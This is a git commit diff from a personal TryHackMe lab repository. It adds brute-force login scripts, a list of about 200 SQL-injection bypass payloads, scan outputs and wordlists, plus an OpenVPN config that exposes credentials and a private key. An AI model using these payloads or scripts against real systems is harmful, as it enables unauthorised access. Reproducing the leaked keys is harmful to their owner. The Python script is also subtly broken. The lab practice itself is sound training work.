curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

2026-03-11

Browse Source
This commit is contained in:
Curo
2026-03-11 10:56:27 +01:00
parent 1b6dfea090
commit 0e30222666
37 changed files with 4467 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
AoC/2025/14/deploy_user_pass.txt Normal file
View File

@@ -0,0 +1 @@
DeployMaster2025

BIN
AoC/2025/21/NorthPole.zip Normal file
View File

Binary file not shown.

3790
AoC/2025/21/NorthPolePerformanceReview.hta Normal file
View File

File diff suppressed because it is too large Load Diff

1
AoC/2025/21/zip_pass.txt Normal file
View File

@@ -0,0 +1 @@
CanYouREM3?

BIN
AoC/2025/24/.bruteforce.sh.swp Normal file
View File

Binary file not shown.

10
AoC/2025/24/bruteforce.sh Executable file
View File

@@ -0,0 +1,10 @@
for word in $(cat /usr/share/wordlists/rockyou.txt); do
response=$(curl -s -A "secretcomputer" -X POST -d "username=admin&password=$word" http://10.82.144.99/terminal.php?action=login)
#echo $response
status=$(echo $response | jq -e ".status" | tr -d '"')
printf "Checking %s with status %s \r" "$word" "$status"
if [ "$status" != "fail" ]; then
echo "Credentials are admin:$word"
break
fi
done

5
AoC/2025/24/cookie.txt Normal file
View File

@@ -0,0 +1,5 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
10.82.144.99 FALSE / FALSE 0 PHPSESSID r6grvo93glp6pc1ocqkvfrcelp

49
AoC/2025/24/username.py Normal file
View File

@@ -0,0 +1,49 @@
import requests
import json
import os
#{
# "service": "Wormhole Control Panel",
# "endpoints": {
# "\/terminal.php?action=info": "Public info",
# "\/terminal.php?action=login": "POST: username,password",
# "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
# "\/terminal.php?action=status": "GET: wormhole status",
# "\/terminal.php?action=close": "POST: close wormhole"
# },
# "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
#}
def main():
wordlist = "/usr/share/wordlists/rockyou.txt"
url = "10.81.152.59"
proto = "http"
target = "terminal.php?action=login"
user_agent = "secretcomputer"
headers = {"User-Agent": user_agent}
username = ["user", "admin"]
lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
print(lines)
count = 0
try:
with open(wordlist, 'r') as file:
for user in username:
for word in file:
count += 1
print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
data = {"username": user, "password": word}
response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
if isinstance(response, dict):
if response["status"] != "fail":
print(f"Credentials found: {user}:{password}")
except FileNotFoundError:
print("File not found")
return
except Exception as e:
print(f"An Error occured: {e}")
return
if __name__ == "__main__":
main()

2
AoC/2025/24/username.txt Normal file
View File

@@ -0,0 +1,2 @@
user
admin

33
AoC/2025/sq1/base_wordlist.txt Normal file
View File

@@ -0,0 +1,33 @@
Johnnyboy1982!
Johnnyboy1982@
Johnnyboy1982#
Johnnyboy1982$
Johnnyboy1982%
Johnnyboy1982^
Johnnyboy1982&
Johnnyboy1982*
Johnnyboy1982(
Johnnyboy1982)
Johnnyboy1982-
Johnnyboy1982_
Johnnyboy1982+
Johnnyboy1982=
Johnnyboy1982~
Johnnyboy1982`
Johnnyboy1982[
Johnnyboy1982]
Johnnyboy1982{
Johnnyboy1982}
Johnnyboy1982|
Johnnyboy1982\
Johnnyboy1982:
Johnnyboy1982;
Johnnyboy1982"
Johnnyboy1982'
Johnnyboy1982<
Johnnyboy1982>
Johnnyboy1982,
Johnnyboy1982.
Johnnyboy1982?
Johnnyboy1982/
Johnnyboy1982

0
AoC/2025/01/sideQuest/combined_wordlist.txt → AoC/2025/sq1/combined_wordlist.txt
View File

0
AoC/2025/01/sideQuest/facebook_pass.txt → AoC/2025/sq1/facebook_pass.txt
View File

0
AoC/2025/01/sideQuest/gobuster_scan_small.txt → AoC/2025/sq1/gobuster_scan_small.txt
View File

0
AoC/2025/01/sideQuest/guard.txt → AoC/2025/sq1/guard.txt
View File

0
AoC/2025/01/sideQuest/nmap_scan.txt → AoC/2025/sq1/nmap_scan.txt
View File

0
AoC/2025/01/sideQuest/nmap_scan1.nmap → AoC/2025/sq1/nmap_scan1.nmap
View File

0
AoC/2025/01/sideQuest/passwords.txt → AoC/2025/sq1/passwords.txt
View File

0
AoC/2025/01/sideQuest/passwords_cewl.txt → AoC/2025/sq1/passwords_cewl.txt
View File

0
AoC/2025/01/sideQuest/passwords_con.txt → AoC/2025/sq1/passwords_con.txt
View File

0
AoC/2025/01/sideQuest/passwords_con.txt.cupp.txt → AoC/2025/sq1/passwords_con.txt.cupp.txt
View File

0
AoC/2025/01/sideQuest/posts.html → AoC/2025/sq1/posts.html
View File

BIN
AoC/2025/sq2/4.2.0.zip Normal file
View File

Binary file not shown.

BIN
AoC/2025/sq2/gobuster.txt Normal file
View File

Binary file not shown.

BIN
AoC/2025/sq2/latest/beacon.bin Executable file
View File

Binary file not shown.

70
AoC/2025/sq2/nmap-scan.txt Normal file
View File

@@ -0,0 +1,70 @@
# Nmap 7.95 scan initiated Tue Dec 9 19:51:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap-scan.txt 10.82.170.160
Nmap scan report for 10.82.170.160
Host is up (0.041s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:ad:e2:2c:8b:d4:f6:f8:1d:47:c8:56:81:ca:f0:86 (ECDSA)
|_ 256 2d:c7:95:46:a2:df:45:9d:bc:8a:5c:a7:2f:a6:4f:23 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Under Construction
9004/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, RPCCheck, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| Payload Storage Malhare's
| Version 4.2.0
| >>Invalid option
| GenericLines, NULL:
| Payload Storage Malhare's
|_ Version 4.2.0
21337/tcp open http Werkzeug httpd 3.0.1 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.1 Python/3.12.3
|_http-title: Unlock Hopper's Memories
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9004-TCP:V=7.95%I=7%D=12/9%Time=69386FDC%P=aarch64-unknown-linux-gn
SF:u%r(NULL,46,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]
SF:\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(JavaRMI,55,"Paylo
SF:ad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U
SF::\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(GenericLines,46,
SF:"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\
SF:]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(GetRequest,55,"Payload\x20Sto
SF:rage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\
SF:x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(HTTPOptions,55,"Payload\x
SF:20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\
SF:[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RTSPRequest,55,"Payl
SF:oad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20
SF:U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RPCCheck,55,"Pa
SF:yload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x
SF:20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(DNSVersionBin
SF:dReqTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\
SF:x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r
SF:(DNSStatusRequestTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\
SF:.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x2
SF:0option\n")%r(Help,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2
SF:\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20o
SF:ption\n")%r(SSLSessionReq,55,"Payload\x20Storage\x20Malhare's\nVersion\
SF:x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Inval
SF:id\x20option\n")%r(TerminalServerCookie,55,"Payload\x20Storage\x20Malha
SF:re's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\
SF:x20E:\n>>Invalid\x20option\n")%r(TLSSessionReq,55,"Payload\x20Storage\x
SF:20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\
SF:n\[4\]\x20E:\n>>Invalid\x20option\n")%r(Kerberos,55,"Payload\x20Storage
SF:\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D
SF::\n\[4\]\x20E:\n>>Invalid\x20option\n");
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 43.94 ms 192.168.128.1
2 ...
3 44.79 ms 10.82.170.160
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 9 19:52:26 2025 -- 1 IP address (1 host up) scanned in 52.64 seconds

13
CTF/Injections/gobuster.txt Normal file
View File

@@ -0,0 +1,13 @@
/index.php  (Status: 200) [Size: 6588]
/login.php  (Status: 200) [Size: 5401]
/mail.log  (Status: 200) [Size: 1098]
/flags  (Status: 301) [Size: 314] [--> http://10.82.175.205/flags/]
/css  (Status: 301) [Size: 312] [--> http://10.82.175.205/css/]
/js  (Status: 301) [Size: 311] [--> http://10.82.175.205/js/]
/javascript  (Status: 301) [Size: 319] [--> http://10.82.175.205/javascript/]
/logout.php  (Status: 302) [Size: 0] [--> index.php]
/vendor  (Status: 301) [Size: 315] [--> http://10.82.175.205/vendor/]
/dashboard.php  (Status: 302) [Size: 0] [--> dashboard.php]
/functions.php  (Status: 200) [Size: 0]
/phpmyadmin  (Status: 301) [Size: 319] [--> http://10.82.175.205/phpmyadmin/]
/conn.php  (Status: 200) [Size: 0]

0
CTF/Injections/nmap_scan1.nmap → CTF/Injections/hist/nmap_scan1.nmap
View File

0
CTF/Injections/nmap_scan2.nmap → CTF/Injections/hist/nmap_scan2.nmap
View File

0
CTF/Injections/pass.txt → CTF/Injections/hist/pass.txt
View File

32
CTF/Injections/nmap_scan.txt Normal file
View File

@@ -0,0 +1,32 @@
# Nmap 7.95 scan initiated Fri Dec 12 11:49:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.175.205
Nmap scan report for 10.82.175.205
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 27:7b:ea:74:bf:6d:16:89:c8:54:28:1e:c8:2b:f1:56 (RSA)
| 256 37:2b:c1:36:20:7e:17:bf:83:b3:3d:3e:06:3e:12:a4 (ECDSA)
|_ 256 fd:87:f9:03:11:6c:d9:3c:fc:d1:d3:88:b3:bf:c7:91 (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Injectics Leaderboard
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 3 hops
Service Info: Host: ip-10-82-175-205.eu-west-1.compute.internal; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.12 ms 192.168.128.1
2 ...
3 40.22 ms 10.82.175.205
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 12 11:50:22 2025 -- 1 IP address (1 host up) scanned in 49.22 seconds

198
CTF/Injections/sqli_bypass.txt Normal file
View File

@@ -0,0 +1,198 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
'
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or 1=1
or true
' or ''='
" or ""="
1) and '1='1
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1
' and 'one'='one
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0
" or 0=0 --
" or 0=0 #
" or 0=0
%' or '0'='0
or 1=1
or 1=1--
or 1=1/*
or 1=1#
or 1=1
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1='1
' or 1=1
' or 1=1 --
' or 1=1
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1='1
) or ('1='1
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'

131
TryHackMe.ovpn Normal file
View File

@@ -0,0 +1,131 @@
client
dev tun
proto udp
remote ga-eu-west-1-vpn.vm.tryhackme.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
auth-user-pass
<auth-user-pass>
6751e250fca37178fb3202da
cd4112418a2d993b6f2290e96b74d4df
</auth-user-pass>
remote-cert-tls server
verify-x509-name openvpn-server name
data-ciphers AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305
auth SHA256
explicit-exit-notify 1
verb 3
<ca>
-----BEGIN CERTIFICATE-----
MIIFCzCCAvOgAwIBAgIUOr05T3QAQ/evssMZTXqD31VQdMEwDQYJKoZIhvcNAQEL
BQAwFTETMBEGA1UEAwwKT3BlblZQTi1DQTAeFw0yNTEwMzExMzA1MjZaFw0zNTEw
MjkxMzA1MjZaMBUxEzARBgNVBAMMCk9wZW5WUE4tQ0EwggIiMA0GCSqGSIb3DQEB
AQUAA4ICDwAwggIKAoICAQClsYy5qvtax0Kk/qO1m3wSiWAX9e1GP8Kfwh/ygXUQ
18mANG3fF4INAkBQxaYzHIlHJFt1q3jJob3uOprbKDr8b6IxclqblaTlxLrePlwN
nJkyME4FB24rgX3i9NE+oRez2J+7+LEqP5z4hVDb9K/xl2NnRBkSGV0hhZPJd/Yq
ZAu4FuEyz6RORHHNuXTUeqSqNVuV0nFp1yw7Q//Gvm4s6fuoSd6o11glXEA4ViL3
+ScoMJZJZkkZwgZai18QMuyCSveR6kywtxGEofH6AXzgJBAoSUi8Th6ePsT74sAY
+QR42cV0hSzOBgmNAkk9mtEmKeU0EkeCZCGmse+aF3Hmam1ZU3FgLIH1GA9ll9aJ
e8MqA90QlnsUS9P5DcWTjIbccrMqK1oh8GA9JnYWcOt2kCUhUhMFKZkJuSwdKrud
oMBCjNq5mReDASvlHjvga3MFyIsbupDr2tB/WmFJ58vcD6cJiDDFdCHlgFJOPnoN
8UG6ii7bAA1Wx2UmtrGXN/6JTPkWp9XHEi/SUpIXNihodng+nVgBNx9nm6Nokydu
XkYVwW+1FAlrdqkXhNzsA++GDFqcSLmk5OvaMXB8ChJuaEn/WWzBlPXu8Zx5FMwd
0+6LlxdIYwX66wOnsSewnwzVgL2pyaQxc/adaK3BNuYwb1+eOfJ1fCRyKzVvUfGj
ewIDAQABo1MwUTAdBgNVHQ4EFgQUKQ9UEDD6nE7aC9FTICd9613MJc8wHwYDVR0j
BBgwFoAUKQ9UEDD6nE7aC9FTICd9613MJc8wDwYDVR0TAQH/BAUwAwEB/zANBgkq
hkiG9w0BAQsFAAOCAgEAE6m+Nmn1YVGmK68Tta4sWVahkzDdlPtFs+3Ebbk/I9CJ
pX+NXq1ibu4HoBtSmsNeOebvxx9YdcQ6OZbtDQcCaUmjmZ+AsJDsubZ746JcIoOf
sAfKSyI4LL+oGOA+k6fs5JQjPnMRqt5wBcWhQW+z0VEvutJ33pO8KNgEgZCSfFkk
rlUNHFfLxYFDJaVxtSH8XZHB74Sz6FMdB745+tviit2k/EtnOV2Ak41zo2PvQYhq
NFNjqpFqdh9jUjoGJrf8/fN+b3IEmoDRRYLIAD2Bq+1GxdK60J8PEQ1HL/u0JUyy
ktLfLdO6yK/YSpOjDkYSmRD/rva/WCi2Jjw6Bs7XfhKdYA/CCk1ic/QpqSNMyO0w
4DrombXHp9UF0jQOfAQKYxJnMvvJpzjtsEzgVWsg7CUUoOtbUSjsz2USS0fJHiwi
KcZSpFuyX33jhoNPDoYHPksi2fm0J5t6jusFyeNfmeb045XFHI9obF+Jm5FtXXYk
ues0mllRVt8cysFR+LSlGZdNbcYhLC9jhxGKkiCGqSwYTm3h+r/foF1f2imL2s33
u7RvTf8ZCoWtFZIOo0/0JZhIactJVD64Tv1sMvpkgiT7d5l0ggucWMiEfxikw8V/
zFGmIiuGBiJmoMJnT3tGf9pUpQ2hCq7U/nx5OTBTDvDhzdzJFnfZ2UBHj4h2MNE=
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
MIIEJDCCAgygAwIBAgIUD7mJmq+vTOSt/JCTWMra9O39HR4wDQYJKoZIhvcNAQEL
BQAwFTETMBEGA1UEAwwKT3BlblZQTi1DQTAeFw0yNTEwMzExMzA1MjZaFw0yODEw
MzAxMzA1MjZaMBIxEDAOBgNVBAMMB2NsaWVudDEwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQDpZKNtpUEOdgu4+2jnDt2r95VIx9/mM86Wj+SPUiT87/og
IEUrI/2DEcM0VxPzdbM6RAlp41wwQwKrCsdRqjfkypPM6qMP6O1VVPrG4c/Guaae
1xKAhVYdPu1AwAJG/pPQbDzN2ybTtCUC3b1UDA8pnl0sxfvzfuOk5uxv1ed+qDm9
pwiML5AqdSuLW11mSGUpTzhUqZLLDvAl0l6QJW61nm2AIaiUco6sMc0k1UvAJb83
jSWXaK0qPTLQT2Bqtbuq6cb8y1aLiQ5MPqNCZNM6bx5QFLPWb0572wx6+pJnadFJ
TkrrkxxAHQCnXlGd6iCM6W/KgWqxbu/CvKo/w7CxAgMBAAGjbzBtMAkGA1UdEwQC
MAAwCwYDVR0PBAQDAgWgMBMGA1UdJQQMMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSl
Rx6m99UpK7tnOukyr1ZGIsFcYjAfBgNVHSMEGDAWgBQpD1QQMPqcTtoL0VMgJ33r
XcwlzzANBgkqhkiG9w0BAQsFAAOCAgEAie8+t6I3zaJ2QJE9hSSEAuosF7FKFmp9
oLYqCh7teSvGL8taN4FS8OcAS/5o0SSGbKbmE/gZb4MWwDNWx9fatJ3G+cWp3YVN
hk53ptqShov3UvfpIFTiaDhOtnjIhOHZTyCf3UvQ6CKyK70bJd54+sqbl65C3ye0
KzdndU0WCThx5OVSni4j1ij7gf9h+InhwOD6D5H7DyF3gPHIqMy2KgCKvQl9rcfB
w8gQD6sIwbS+a9mys07nIfzL8Jl1H93sWsoVvjYCIy10Bj+5ikulP25mB0FajP4S
iuTJCSSxq6RlbdBnqti9NvxpUvDPqlUbZXgZAG+v80zRYcfAN0NaNJKfh+bkqLZk
PfPj9jWmGHrXHs0rPhGzBfgGPlcAGdL+CRIEXax9fw1D4Ywiq5gcsCcLxWDJveAl
Grwtn9l2sPKxBT1umscSp54qK+HXRr1jHzJWSQD2Ko2qefINCPn0vF99PJZWfHIj
YTQ8iM6UeYdu1XmsccICjkSnmG9SlTVUmONiXt0+zRp3OXzTuVEfv0M9Dl5PaUjz
GyVrHAhUHGKYHTmF8UiAivLs8EYisGuetplRDWaMD1GRVwTDUlxAcIGVh2xj2XxT
3yAOzPCfIDrS0i4VgrbBE64jhprgLaxgTgDUNjEB63z1Lt5IPUPb7bpw7LjOyMoH
o4N+otVx7f0=
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDpZKNtpUEOdgu4
+2jnDt2r95VIx9/mM86Wj+SPUiT87/ogIEUrI/2DEcM0VxPzdbM6RAlp41wwQwKr
CsdRqjfkypPM6qMP6O1VVPrG4c/Guaae1xKAhVYdPu1AwAJG/pPQbDzN2ybTtCUC
3b1UDA8pnl0sxfvzfuOk5uxv1ed+qDm9pwiML5AqdSuLW11mSGUpTzhUqZLLDvAl
0l6QJW61nm2AIaiUco6sMc0k1UvAJb83jSWXaK0qPTLQT2Bqtbuq6cb8y1aLiQ5M
PqNCZNM6bx5QFLPWb0572wx6+pJnadFJTkrrkxxAHQCnXlGd6iCM6W/KgWqxbu/C
vKo/w7CxAgMBAAECggEAGeV+g7s/G3NqLBGLS335Byx+vjddRs3vSYH4TpXDAGTB
OGDUQ+vnpGwrYGqcDlq8MwYbFEpzr3A0AtX8lTlhn8uBeE59ntWNxfbap4glNYvi
asP669M/oZmamiFj70wuiwUDfyTmqz1VEPsZF5MJ+Kh3drEWGme1KxYrXGJb4A/k
poXqT6B2iAXGF0FLvgoCAPS7oM8xQcdnLPWdeIoClxkEVutU3+Ks5vVkRPHjnCnc
deZZDU9gMZZSpa/TS+rDS2LyMc36HPhvJWe8+Py0HwhQ11FvWZma6FMVDy0puU9s
wMOWI5vg8/D3R0xgtyXhVZ/0iIxtWqp/pI0ihniCZQKBgQD9gexbSz8d+NxF8ZTA
8WW8vAyhJJRHSj0l6Des/nq43WjObhoU+OVmYhre7yM4md2Ro07pTjVOpxLcrtLB
gUL1CrPHnc6frd9JgKIJ6HUYXTAYFwDDFp2FMWFFKU1H0QLqW2a5YA3xGODm+nj5
dNgQYmCFYCH/m/KuX1EAYR8D9QKBgQDrsBZbERYcDFuFsXR6hmiVgWpQ72+ef9ZA
+TM2Nwquw74xCA+Fw7feQgjyOpVfSWZRVoAxePeb6STjmcYF8FZrebuEdmastg5h
NzOR7IpT5BG/JhEA83dl244EP9Q/uA+uHGyp1pN342grO7UIwVhinY5bqQMbKnj6
tE1txYGATQKBgB0MxF750nPGzscdFeS+ROBJ1FCq9mrs8PDlGWwzhTCl/pqZN1fr
5a3D1Dxzvt9/kkpcInDNy4IF1z1+sxwFify2iz92r/TQYeP0X50vDCwMkbRQ/n9c
mhRnQjRAtWBjbSgZ7T2U6kQUi8EsNqyvXQsTmuftyjeWUUr2FTwr5Pf5AoGBAOjK
DNq33qmnfwJnCxA2D7iTkcoNJKddxuZ3/SAwb2m8xu8w8fwCG2r4uFNgj8cE/X2b
PZUf0Rl6x0fSy6d0Aje3jgJA3Br82ukkl9gq1VoU635sf+D7mNPPbs89qEujZkFn
q+B4o0GIKIyDNcVHCyCkVEaugfXkFogxbETfDpEFAoGAHEDY+NM95kqAADep9O5P
ZOp3r5y7DdgSkBOYeQeyI9/3l9PctMJkklJKKaPI1bTH9gswTiCBCV2bsxdTUsOk
vVkLhPHCvAc3nz83uTu2+x6GK7XF9G6qIgudYbHcphLFSFwLEUGkuENT7+YTYcce
FpCwrgkEI5UfX7WeZDxPzeI=
-----END PRIVATE KEY-----
</key>
<tls-crypt>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d817bc3c9ac4014f17bbf3aead5f2379
52ce9f54592c6bdc070af9fff878b142
e8210588b6f8c2b80b5c9bc588854516
c5d32cdc806ebaa2dee681dc861ad504
634eecd94fae850d5d617a0abc4e7819
93c7a3d505cfc28678c54a1e85a54035
ce3053a412cf385408038ca8eacdd48d
1d8a9eef60fc3c01ebf5a6fdb0184cfd
24e1088a241dfb474110116a85e88fef
cbd0348050170dd39a9ede3e0731e113
b2a95c526dde09744f396ceaddb9dc0c
1f514fc04ac33407124f6fe4a86aabc8
1cda5b5be56de4fbb5b16c9a728210cd
3b03f51dfa6ecff2694f6b6e1458b12f
e4ef409b3c569f3339aa469cb20ac537
d9c87f6f7ae372e2ea2c28b27ffd9fa7
-----END OpenVPN Static key V1-----
</tls-crypt>

BIN
Walkthroughs/InsecureDeserialization/gobuster.txt Normal file
View File

Binary file not shown.

3
Walkthroughs/InsecureDeserialization/gobuster_8089.txt Normal file
View File

@@ -0,0 +1,3 @@
index.php  (Status: 200) [Size: 2424]
server.php  (Status: 200) [Size: 2424]
cve.php  (Status: 200) [Size: 85]

1
Walkthroughs/InsecureDeserialization/ip.txt Normal file
View File

@@ -0,0 +1 @@
10.81.136.171

118
Walkthroughs/InsecureDeserialization/nmap_8089.txt Normal file
View File

@@ -0,0 +1,118 @@
# Nmap 7.98 scan initiated Fri Jan 16 17:37:03 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p8089 -oN nmap_8089.txt 10.81.136.171
Nmap scan report for 10.81.136.171
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
8089/tcp open http (PHP 7.2.10)
|_http-title: Laravel
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Fri, 16 Jan 2026 16:37:24 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Cache-Control: no-cache, private
| date: Fri, 16 Jan 2026 16:37:24 GMT
| Content-type: text/html; charset=UTF-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Page Not Found</title>
| <!-- Fonts -->
| <link href="https://fonts.googleapis.com/css?family=Raleway:100,600" rel="stylesheet" type="text/css">
| <!-- Styles -->
| <style>
| html, body {
| background-color: #fff;
| color: #636b6f;
| font-family: 'Raleway', sans-serif;
| font-weight: 100;
| height: 100vh;
| margin: 0;
| GetRequest:
| HTTP/1.0 200 OK
| Date: Fri, 16 Jan 2026 16:37:15 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Cache-Control: private, must-revalidate
| Date: Fri, 16 Jan 2026 16:37:15 GMT
| Content-Type: text/html; charset=UTF-8
